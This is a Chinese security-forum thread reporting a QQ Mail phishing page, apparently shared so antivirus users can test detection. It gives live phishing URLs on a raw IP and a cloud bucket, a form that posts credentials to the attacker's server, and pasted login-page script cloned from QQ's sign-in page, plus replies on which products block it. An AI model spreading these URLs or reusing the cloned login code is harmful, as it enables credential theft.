QQ邮箱钓鱼

BE_HC

依旧怀疑是生成器类型，存在无效挂马

http://84.39.190.212/web/index.php?act=1

<form action="http://84.39.190.212/web/test.php" method="post" onsubmit="return ts()">

https://sx6.obs.cn-ahwh1.ctyun.cn/index.html

1. <script>//错误上报
   
2.   (function(){
   
3.     window.onerror = function(msg,url,line){
   
4.       var reportUrl = "//ui.ptlogin2.qq.com/cgi-bin/report?";
   
5.       var t = document.createElement('img');
   
6.       var e_info=encodeURIComponent(msg+'|_|'+url+'|_|'+line+'|_|'+window.navigator.userAgent);
   
7.       t.src = reportUrl + 'id=195279&msg=' + e_info + '&v=' + Math.random();
   
8.     }
   
9.   })();
   
10. var ptui_daid=encodeURIComponent("4")//业务隔离id
    
11.     ,ptui_appid=encodeURIComponent("522005705")//业务的appid
    
12.     ,ptui_domain=encodeURIComponent("qq.com")//domain
    
13.     ,ptui_regmaster=encodeURIComponent("")
    
14.     ,ptui_lang=encodeURIComponent("2052")
    
15.     ,ptui_pt_version=encodeURIComponent("90305")
    
16.     ,ptui_version=encodeURIComponent("201203081004")
    
17.     ,ptui_style=encodeURIComponent("9")
    
18.     ,ptui_noAuth="0"//是否需要去检查业务隔离，默认为1，需要检查（数字）
    
19.     ,g_href="https\x3A\x2F\x2Fui.ptlogin2.qq.com\x2Fcgi-bin\x2Flogin\x3Fstyle\x3D9\x26appid\x3D522005705\x26daid\x3D4\x26s_url\x3Dhttps\x253A\x252F\x252Fw.mail.qq.com\x252Fcgi-bin\x252Flogin\x253Fvt\x253Dpassport\x2526vm\x253Dwsk\x2526delegate_url\x253D\x2526f\x253Dxhtml\x2526target\x253D\x26hln_css\x3Dhttp\x253A\x252F\x252Fmail.qq.com\x252Fzh_CN\x252Fhtmledition\x252Fimages\x252Flogo\x252Fqqmail\x252Fqqmail_logo_default_200h.png\x26low_login\x3D1\x26hln_autologin\x3D\x25E8\x25AE\x25B0\x25E4\x25BD\x258F\x25E7\x2599\x25BB\x25E5\x25BD\x2595\x25E7\x258A\x25B6\x25E6\x2580\x2581\x26pt_no_onekey\x3D1"
    
20.     ,ptui_pt_qzone_sig="0"
    
21.     ,ptui_pt_light="0"//轻登录，只下发p_skey,取值0或者1
    
22.     ,ptui_pt_ttype="0"
    
23.     ,ptui_pt_3rd_aid=encodeURIComponent("0")//互联的第三方appid
    
24.     ,ptui_enablePwd=encodeURIComponent("")//互联的登录是否使用密码控件
    
25.     ,ptui_target = encodeURIComponent("_self")//跳转方式
    
26.     ,ptui_low_login = parseInt("1", 10) || 0
    
27.     ,ptui_low_login_hour = parseInt("0", 10) || 720 // 弱登录时间，默认一个月
    
28.     ,ptui_kf_csimc = encodeURIComponent("0")
    
29.     ,ptui_kf_csnum = encodeURIComponent("0")
    
30.         ,ptui_kf_authid = encodeURIComponent("0")
    
31.         ,ptui_defuin = ""//设置的默认uin(input value 赋值)
    
32.     ,ptui_force_qr = ""
    
33.         ,ptui_lockuin = parseInt("0");
    
34. if (ptui_daid == 1)
    
35.     ptui_daid = 0; // 因为业务总是填错，所以daid=1也认为是没填的
    
36. var STR_LANG = {
    
37.          no_uin:"你还没有输入帐号！",
    
38.          no_password:"你还没有输入密码！",
    
39.          no_code:"你还没有输入验证码！",
    
40.          err_uin:"请输入正确的帐号！",
    
41.          less_code:"请输入完整的验证码！",
    
42.          err_code:"请输入完整的验证码！",
    
43.          onekey:"一键登录",
    
44.          onekeying:"正在拉起QQ手机版...",
    
45.          offline: "网络异常",
    
46.      close: "关闭",
    
47.      password_error_tips: '若你的帐号为非大陆手机号，请<a href="javascript:pt.enterOverseaLogin()">点击这里</a>进行登录。'
    
48. };</script>

复制代码

秋日之殇

卡巴斯基拦截

暗影皇帝

第一个打不开，第二个正常打开，没被拦截，用360沙箱扫描提示可疑

keen-qv

猎豹浏览器拦截

846472713

• FSS
• 智量
  

wwwab

还存在vbs格式的感染型Ramnit病毒

BE_HC

wwwab 发表于 2021-10-1 12:55
还存在vbs格式的感染型Ramnit病毒

那个是无效挂马来的

swizzer

好家伙，我这里的智量不杀

@智量官方

是跟迈克菲的联网顾问插件有冲突？

智量官方

swizzer 发表于 2021-10-20 21:23
好家伙，我这里的智量不杀

@智量官方

刷新以下DNS缓存看看, 命令提示符输入ipconfig /flushdns

小飞侠.net

360极速X+Onedns不拦，其它如图：